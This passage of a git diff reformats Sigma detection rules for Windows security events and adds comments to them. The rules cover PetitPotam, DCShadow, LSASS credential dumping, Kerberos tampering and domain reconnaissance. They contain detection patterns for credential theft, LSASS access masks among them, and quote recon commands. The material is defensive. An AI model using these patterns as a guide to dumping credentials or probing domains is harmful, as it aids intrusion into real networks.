https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825 author: Pushkarev Dmitry diff --git a/sigma/builtin/security/win_security_password_policy_enumerated.yml b/sigma/builtin/security/win_security_password_policy_enumerated.yml index 1109b3a6c..850cf1be8 100644 --- a/sigma/builtin/security/win_security_password_policy_enumerated.yml +++ b/sigma/builtin/security/win_security_password_policy_enumerated.yml @@ -18,8 +18,8 @@ detection: security: Channel: Security selection: - EventID: 4661 - AccessList|contains: '%%5392' + EventID: 4661 # A handle to an object was requested. + AccessList|contains: '%%5392' # ReadPasswordParameters ObjectServer: Security Account Manager condition: security and selection level: medium diff --git a/sigma/builtin/security/win_security_pcap_drivers.yml b/sigma/builtin/security/win_security_pcap_drivers.yml index d99669b76..a09db69fc 100644 --- a/sigma/builtin/security/win_security_pcap_drivers.yml +++ b/sigma/builtin/security/win_security_pcap_drivers.yml @@ -1,8 +1,7 @@ title: Windows Pcap Drivers id: 7b687634-ab20-11ea-bb37-0242ac130002 status: test -description: Detects Windows Pcap driver installation based on a list of associated - .sys files. +description: Detects Windows Pcap driver installation based on a list of associated .sys files. references: - https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more author: Cian Heasley @@ -15,8 +14,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_petitpotam_network_share.yml b/sigma/builtin/security/win_security_petitpotam_network_share.yml index 94c7b4d90..680c9f12f 100644 --- a/sigma/builtin/security/win_security_petitpotam_network_share.yml +++ b/sigma/builtin/security/win_security_petitpotam_network_share.yml @@ -14,14 +14,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Detailed File Share" - must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName|startswith: \\\\ + ShareName|startswith: \\\\ # looking for the string \\somethink\IPC$ ShareName|endswith: \IPC$ RelativeTargetName: lsarpc SubjectUserName: ANONYMOUS LOGON diff --git a/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml b/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml index a56617db1..b66024c49 100644 --- a/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml +++ b/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml @@ -1,22 +1,12 @@ title: PetitPotam Suspicious Kerberos TGT Request id: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5 status: test -description: 'Detect suspicious Kerberos TGT requests. - - Once an attacer obtains a computer certificate by abusing Active Directory Certificate - Services in combination with PetitPotam, the next step would be to leverage the - certificate for malicious purposes. - - One way of doing this is to request a Kerberos Ticket Granting Ticket using a - tool like Rubeus. - - This request will generate a 4768 event with some unusual fields depending on - the environment. - - This analytic will require tuning, we recommend filtering Account_Name to the - Domain Controller computer accounts. - - ' +description: | + Detect suspicious Kerberos TGT requests. + Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. + One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. + This request will generate a 4768 event with some unusual fields depending on the environment. + This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts. references: - https://github.com/topotam/PetitPotam - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ @@ -30,8 +20,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Account Logon > Kerberos Authentication - Service" must be configured for Success/Failure + definition: The advanced audit policy setting "Account Logon > Kerberos Authentication Service" must be configured for Success/Failure detection: security: Channel: Security @@ -45,7 +34,6 @@ detection: CertThumbprint: '' condition: security and (selection and not 1 of filter_*) falsepositives: - - False positives are possible if the environment is using certificates for authentication. - We recommend filtering Account_Name to the Domain Controller computer accounts. + - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_possible_dc_shadow.yml b/sigma/builtin/security/win_security_possible_dc_shadow.yml index e1621c296..bad5c1181 100644 --- a/sigma/builtin/security/win_security_possible_dc_shadow.yml +++ b/sigma/builtin/security/win_security_possible_dc_shadow.yml @@ -1,8 +1,8 @@ title: Possible DC Shadow Attack id: 32e19d25-4aed-4860-a55a-be99cb0bf7ed related: - - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a - type: derived + - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a + type: derived status: test description: Detects DCShadow via create new SPN references: @@ -18,14 +18,7 @@ tags: logsource: product: windows service: security - definition: The "Audit Directory Service Changes" logging policy must be configured - in order to receive events. Audit events are generated only for objects with - configured system access control lists (SACLs). Audit events are generated - only for objects with configured system access control lists (SACLs) and only - when accessed in a manner that matches their SACL settings. This policy covers - the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default - policy does not cover User objects. For that a custom AuditRule need to be - setup (See https://github.com/OTRF/Set-AuditRule) + definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule) detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml b/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml index 1953f2450..ba450504a 100644 --- a/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml +++ b/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml @@ -1,8 +1,8 @@ title: PowerShell Scripts Installed as Services - Security id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 related: - - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae - type: derived + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived status: test description: Detects powershell script installed as a Service references: @@ -16,8 +16,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_protected_storage_service_access.yml b/sigma/builtin/security/win_security_protected_storage_service_access.yml index dea24af4d..a003d61a8 100644 --- a/sigma/builtin/security/win_security_protected_storage_service_access.yml +++ b/sigma/builtin/security/win_security_protected_storage_service_access.yml @@ -1,8 +1,7 @@ title: Protected Storage Service Access id: 45545954-4016-43c6-855e-eae8f1c369dc status: test -description: Detects access to a protected_storage service over the network. Potential - abuse of DPAPI to extract domain backup keys from Domain Controllers +description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers references: - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml b/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml index 7fb4b703f..fe9216644 100644 --- a/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml +++ b/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml @@ -1,8 +1,7 @@ title: RDP over Reverse SSH Tunnel WFP id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41 status: test -description: Detects svchost hosting RDP termsvcs communicating with the loopback - address +description: Detects svchost hosting RDP termsvcs communicating with the loopback address references: - https://twitter.com/SBousseaden/status/1096148422984384514 - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx @@ -37,12 +36,11 @@ detection: - ::1 filter_app_container: FilterOrigin: AppContainer Loopback - filter_thor: + filter_thor: # checking BlueKeep vulnerability Application|endswith: - \thor.exe - \thor64.exe - condition: security and (selection and ( sourceRDP or destinationRDP ) and not - 1 of filter*) + condition: security and (selection and ( sourceRDP or destinationRDP ) and not 1 of filter*) falsepositives: - Programs that connect locally to the RDP port level: high diff --git a/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml b/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml index eb4c84431..c3f52f7eb 100644 --- a/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml +++ b/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml @@ -1,16 +1,10 @@ title: Service Registry Key Read Access Request id: 11d00fff-5dc3-428c-8184-801f292faec0 status: experimental -description: 'Detects "read access" requests on the services registry key. - - Adversaries may execute their own malicious payloads by hijacking the Registry - entries used by services. - - Adversaries may use flaws in the permissions for Registry keys related to services - to redirect from the originally specified executable to one that they control, - in order to launch their own code when a service starts. - - ' +description: | + Detects "read access" requests on the services registry key. + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. references: - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness @@ -24,8 +18,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: SACLs must be enabled for "READ_CONTROL" on the registry - keys used in this rule' + definition: 'Requirements: SACLs must be enabled for "READ_CONTROL" on the registry keys used in this rule' detection: security: Channel: Security @@ -34,7 +27,7 @@ detection: ObjectName|contains|all: - \SYSTEM\ - ControlSet\Services\ - AccessList|contains: '%%1538' + AccessList|contains: '%%1538' # READ_CONTROL condition: security and selection falsepositives: - Likely from legitimate applications reading their key. Requires heavy tuning diff --git a/sigma/builtin/security/win_security_remote_powershell_session.yml b/sigma/builtin/security/win_security_remote_powershell_session.yml index b0286580d..8cf893cad 100644 --- a/sigma/builtin/security/win_security_remote_powershell_session.yml +++ b/sigma/builtin/security/win_security_remote_powershell_session.yml @@ -1,8 +1,7 @@ title: Remote PowerShell Sessions Network Connections (WinRM) id: 13acf386-b8c6-4fe0-9a6e-c4756b974698 status: test -description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound - connections to ports 5985 OR 5986 +description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986 references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/builtin/security/win_security_replay_attack_detected.yml b/sigma/builtin/security/win_security_replay_attack_detected.yml index 488dc2247..faa8da3b5 100644 --- a/sigma/builtin/security/win_security_replay_attack_detected.yml +++ b/sigma/builtin/security/win_security_replay_attack_detected.yml @@ -1,8 +1,7 @@ title: Replay Attack Detected id: 5a44727c-3b85-4713-8c44-4401d5499629 status: test -description: Detects possible Kerberos Replay Attack on the domain controllers when - "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client +description: Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client references: - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649 diff --git a/sigma/builtin/security/win_security_scm_database_handle_failure.yml b/sigma/builtin/security/win_security_scm_database_handle_failure.yml index 491db370c..2c31728df 100644 --- a/sigma/builtin/security/win_security_scm_database_handle_failure.yml +++ b/sigma/builtin/security/win_security_scm_database_handle_failure.yml @@ -20,11 +20,13 @@ detection: EventID: 4656 ObjectType: SC_MANAGER OBJECT ObjectName: ServicesActive - AccessMask: '0xf003f' + AccessMask: '0xf003f' # is used in the reference; otherwise too many FPs + # Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816 filter: SubjectLogonId: '0x3e4' condition: security and (selection and not filter) falsepositives: - Unknown +# triggering on many hosts in some environments level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_service_install_remote_access_software.yml b/sigma/builtin/security/win_security_service_install_remote_access_software.yml index 80288f8ef..03419834f 100644 --- a/sigma/builtin/security/win_security_service_install_remote_access_software.yml +++ b/sigma/builtin/security/win_security_service_install_remote_access_software.yml @@ -1,11 +1,10 @@ title: Remote Access Tool Services Have Been Installed - Security id: c8b00925-926c-47e3-beea-298fd563728e related: - - id: 1a31b18a-f00c-4061-9900-f735b96c99fc - type: similar + - id: 1a31b18a-f00c-4061-9900-f735b96c99fc + type: similar status: experimental -description: Detects service installation of different remote access tools software. - These software are often abused by threat actors to perform +description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform references: - https://redcanary.com/blog/misbehaving-rats/ author: Connor Martin, Nasreddine Bencherchali (Nextron Systems) @@ -18,38 +17,37 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection: EventID: 4697 ServiceName|contains: - - AmmyyAdmin + # Based on https://github.com/SigmaHQ/sigma/pull/2841 + - AmmyyAdmin # https://www.ammyy.com/en/ - Atera - - BASupportExpressSrvcUpdater - - BASupportExpressStandaloneService + - BASupportExpressSrvcUpdater # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html + - BASupportExpressStandaloneService # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html - chromoting - - GoToAssist - - GoToMyPC + - GoToAssist # https://www.goto.com/it-management/resolve + - GoToMyPC # https://get.gotomypc.com/ - jumpcloud - - LMIGuardianSvc - - LogMeIn + - LMIGuardianSvc # https://www.logmein.com/ + - LogMeIn # https://www.logmein.com/ - monblanking - Parsec - - RManService - - RPCPerformanceService - - RPCService - - SplashtopRemoteService + - RManService # https://www.systemlookup.com/O23/7855-rutserv_exe.html + - RPCPerformanceService # https://www.remotepc.com/ + - RPCService # https://www.remotepc.com/ + - SplashtopRemoteService # https://www.splashtop.com/ - SSUService - TeamViewer - - TightVNC + - TightVNC # https://www.tightvnc.com/ - vncserver - Zoho condition: security and selection falsepositives: - - The rule doesn't look for anything suspicious so false positives are expected. - If you use one of the tools mentioned, comment it out + - The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml b/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml index 90888421c..582411bf1 100644 --- a/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml +++ b/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml @@ -1,11 +1,10 @@ title: Service Installed By Unusual Client - Security id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca related: - - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5 - type: similar + - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5 + type: similar status: test -description: Detects a service installed by a client which has PID 0 or whose parent - has PID 0 +description: Detects a service installed by a client which has PID 0 or whose parent has PID 0 references: - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html - https://www.x86matthew.com/view_post?id=create_svc_rpc @@ -19,16 +18,15 @@ tags: logsource: service: security product: windows - definition: 'Requirements: The System Security Extension audit subcategory need - to be enabled to log the EID 4697' + definition: 'Requirements: The System Security Extension audit subcategory need to be enabled to log the EID 4697' detection: security: Channel: Security selection_eid: EventID: 4697 selection_pid: - - ClientProcessId: 0 - - ParentProcessId: 0 + - ClientProcessId: 0 + - ParentProcessId: 0 condition: security and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml b/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml index a2eb13f01..b90e480e1 100644 --- a/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml +++ b/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml @@ -1,8 +1,7 @@ title: SMB Create Remote File Admin Share id: b210394c-ba12-4f89-9117-44a2464b9511 status: test -description: Look for non-system accounts SMB accessing a file with write (0x2) access - mask via administrative share (i.e C$). +description: Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$). references: - https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml - https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file diff --git a/sigma/builtin/security/win_security_susp_add_sid_history.yml b/sigma/builtin/security/win_security_susp_add_sid_history.yml index 341fb774b..7aae648fe 100644 --- a/sigma/builtin/security/win_security_susp_add_sid_history.yml +++ b/sigma/builtin/security/win_security_susp_add_sid_history.yml @@ -27,9 +27,8 @@ detection: - '-' - '%%1793' filter_null: - SidHistory: null - condition: security and (selection1 or (selection2 and not selection3 and not - filter_null)) + SidHistory: + condition: security and (selection1 or (selection2 and not selection3 and not filter_null)) falsepositives: - Migration of an account into a new domain level: medium diff --git a/sigma/builtin/security/win_security_susp_computer_name.yml b/sigma/builtin/security/win_security_susp_computer_name.yml index e6bb94b93..dd4efc2ae 100644 --- a/sigma/builtin/security/win_security_susp_computer_name.yml +++ b/sigma/builtin/security/win_security_susp_computer_name.yml @@ -19,6 +19,7 @@ logsource: service: security product: windows detection: + # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created) security: Channel: Security selection1: diff --git a/sigma/builtin/security/win_security_susp_dsrm_password_change.yml b/sigma/builtin/security/win_security_susp_dsrm_password_change.yml index 1cee34a9b..be0f60b98 100644 --- a/sigma/builtin/security/win_security_susp_dsrm_password_change.yml +++ b/sigma/builtin/security/win_security_susp_dsrm_password_change.yml @@ -1,8 +1,7 @@ title: Password Change on Directory Service Restore Mode (DSRM) Account id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51 status: stable -description: The Directory Service Restore Mode (DSRM) account is a local administrator - account on Domain Controllers. Attackers may change the password to gain persistence. +description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence. references: - https://adsecurity.org/?p=1714 author: Thomas Patzke diff --git a/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml b/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml index 610d549e8..d165227f7 100644 --- a/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml +++ b/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml @@ -1,8 +1,7 @@ title: Account Tampering - Suspicious Failed Logon Reasons id: 9eb99343-d336-4020-a3cd-67f3819e68ee status: test -description: This method uses uncommon error codes on failed logons to determine suspicious - activity and tampering with accounts that have been disabled or somehow restricted. +description: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 - https://twitter.com/SBousseaden/status/1101431884540710913 @@ -26,12 +25,12 @@ detection: - 4625 - 4776 Status: - - '0xC0000072' - - '0xC000006F' - - '0xC0000070' - - '0xC0000413' - - '0xC000018C' - - '0xC000015B' + - '0xC0000072' # User logon to account disabled by administrator + - '0xC000006F' # User logon outside authorized hours + - '0xC0000070' # User logon from unauthorized workstation + - '0xC0000413' # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine + - '0xC000018C' # The logon request failed because the trust relationship between the primary domain and the trusted domain failed + - '0xC000015B' # The user has not been granted the requested logon type (aka logon right) at this machine filter: SubjectUserSid: S-1-0-0 condition: security and (selection and not filter) diff --git a/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml b/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml index 95b7f31ad..5eb38cf3b 100644 --- a/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml +++ b/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml @@ -1,8 +1,7 @@ title: Kerberos Manipulation id: f7644214-0eb0-4ace-9455-331ec4c09253 status: test -description: This method triggers on rare Kerberos Failure Codes caused by manipulations - of Kerberos messages +description: This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages author: Florian Roth (Nextron Systems) date: 2017/02/10 modified: 2021/11/27 diff --git a/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml b/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml index 663989f53..e39ac3ff9 100644 --- a/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml +++ b/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml @@ -1,9 +1,7 @@ title: Suspicious LDAP-Attributes Used id: d00a9a72-2c09-4459-ad03-5e0a23351e36 status: test -description: Detects the usage of particular AttributeLDAPDisplayNames, which are - known for data exchange via LDAP by the tool LDAPFragger and are additionally - not commonly used in companies. +description: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. references: - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961 - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/ @@ -17,14 +15,7 @@ tags: logsource: product: windows service: security - definition: The "Audit Directory Service Changes" logging policy must be configured - in order to receive events. Audit events are generated only for objects with - configured system access control lists (SACLs). Audit events are generated - only for objects with configured system access control lists (SACLs) and only - when accessed in a manner that matches their SACL settings. This policy covers - the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default - policy does not cover User objects. For that a custom AuditRule need to be - setup (See https://github.com/OTRF/Set-AuditRule) + definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule) detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml b/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml index dbbdaa939..0e629225c 100644 --- a/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml +++ b/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml @@ -1,9 +1,7 @@ title: Suspicious Windows ANONYMOUS LOGON Local Account Created id: 1bbf25b9-8038-4154-a50b-118f2a32be27 status: test -description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, - such as using additional spaces. Created as an covering detection for exclusion - of Logon Type 3 from ANONYMOUS LOGON accounts. +description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. references: - https://twitter.com/SBousseaden/status/1189469425482829824 author: James Pemberton / @4A616D6573 diff --git a/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml b/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml index 64ada9035..424be2647 100644 --- a/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml +++ b/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml @@ -4,8 +4,7 @@ status: test description: Detects suspicious processes logging on with explicit credentials references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view -author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, - Tim Shelton +author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton date: 2020/10/05 modified: 2022/08/03 tags: diff --git a/sigma/builtin/security/win_security_susp_lsass_dump.yml b/sigma/builtin/security/win_security_susp_lsass_dump.yml index 99641570c..4a9ce3d77 100644 --- a/sigma/builtin/security/win_security_susp_lsass_dump.yml +++ b/sigma/builtin/security/win_security_susp_lsass_dump.yml @@ -1,8 +1,7 @@ title: Password Dumper Activity on LSASS id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c status: test -description: Detects process handle on LSASS process with certain access mask and - object type SAM_DOMAIN +description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN references: - https://twitter.com/jackcr/status/807385668833968128 author: sigma diff --git a/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml b/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml index da04386fb..9740a2fe3 100644 --- a/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml +++ b/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml @@ -5,8 +5,7 @@ description: Detects process handle on LSASS process with certain access mask references: - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, - Aleksey Potapov, oscd.community (update) +author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 modified: 2023/12/19 tags: @@ -20,23 +19,24 @@ detection: security: Channel: Security selection_1: - EventID: 4656 + EventID: 4656 # A handle to an object was requested. ObjectName|endswith: \lsass.exe AccessMask|contains: - '0x40' - '0x1400' + # - '0x1000' # minimum access requirements to query basic info from service - '0x100000' - - '0x1410' - - '0x1010' - - '0x1438' - - '0x143a' - - '0x1418' + - '0x1410' # car.2019-04-004 + - '0x1010' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 + - '0x1418' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' - '0x1f3fff' selection_2: - EventID: 4663 + EventID: 4663 # An attempt was made to access an object ObjectName|endswith: \lsass.exe AccessList|contains: - '4484' @@ -47,21 +47,21 @@ detection: - \GamingServices.exe - \lsm.exe - \MicrosoftEdgeUpdate.exe - - \minionhost.exe - - \MRT.exe - - \MsMpEng.exe + - \minionhost.exe # Cyberreason + - \MRT.exe # MS Malware Removal Tool + - \MsMpEng.exe # Defender - \perfmon.exe - \procexp.exe - \procexp64.exe - \svchost.exe - \taskmgr.exe - - \thor.exe - - \thor64.exe + - \thor.exe # THOR + - \thor64.exe # THOR - \vmtoolsd.exe - - \VsTskMgr.exe + - \VsTskMgr.exe # McAfee Enterprise - \wininit.exe - \wmiprvse.exe - - RtkAudUService64 + - RtkAudUService64 # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff ProcessName|contains: - :\Program Files (x86)\ - :\Program Files\ @@ -71,7 +71,7 @@ detection: - :\Windows\SysWow64\ - :\Windows\Temp\asgard2-agent\ filter_main_generic: - ProcessName|contains: :\Program Files + ProcessName|contains: :\Program Files # too many false positives with legitimate AV and EDR solutions filter_main_exact: ProcessName|endswith: - :\Windows\System32\taskhostw.exe @@ -85,6 +85,7 @@ detection: ProcessName|endswith: \aurora-agent-64.exe AccessList|contains: '%%4484' filter_main_scenarioengine: + # Example: C:\a70de9569c3a5aa22184ef52a890177b\x64\SCENARIOENGINE.EXE ProcessName|endswith: \x64\SCENARIOENGINE.EXE AccessList|contains: '%%4484' filter_main_avira1: @@ -109,10 +110,8 @@ detection: - \procmon64.exe - \procmon.exe AccessList|contains: '%%4484' - condition: security and (1 of selection_* and not 1 of filter_main_* and not 1 - of filter_optional_*) + condition: security and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate software accessing LSASS process for legitimate reason; update the - whitelist with it + - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_susp_net_recon_activity.yml b/sigma/builtin/security/win_security_susp_net_recon_activity.yml index 47ffa723b..32b01f92f 100644 --- a/sigma/builtin/security/win_security_susp_net_recon_activity.yml +++ b/sigma/builtin/security/win_security_susp_net_recon_activity.yml @@ -1,12 +1,10 @@ title: Reconnaissance Activity id: 968eef52-9cff-4454-8992-1e74b9cbad6c status: test -description: Detects activity as "net user administrator /domain" and "net group domain - admins /domain" +description: Detects activity as "net user administrator /domain" and "net group domain admins /domain" references: - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html -author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), - oscd.community +author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community date: 2017/03/07 modified: 2022/08/22 tags: @@ -17,9 +15,7 @@ tags: logsource: product: windows service: security - definition: The volume of Event ID 4661 is high on Domain Controllers and therefore - "Audit SAM" and "Audit Kernel Object" advanced audit policy settings are not - configured in the recommendations for server systems + definition: The volume of Event ID 4661 is high on Domain Controllers and therefore "Audit SAM" and "Audit Kernel Object" advanced audit policy settings are not configured in the recommendations for server systems detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml index 749692c8c..8e574a43b 100644 --- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml +++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml @@ -1,8 +1,7 @@ title: Password Protected ZIP File Opened id: 00ba9da1-b510-4f6b-b258-8d338836180f status: test -description: Detects the extraction of password protected ZIP archives. See the filename - variable for more details on which file has been opened. +description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 author: Florian Roth 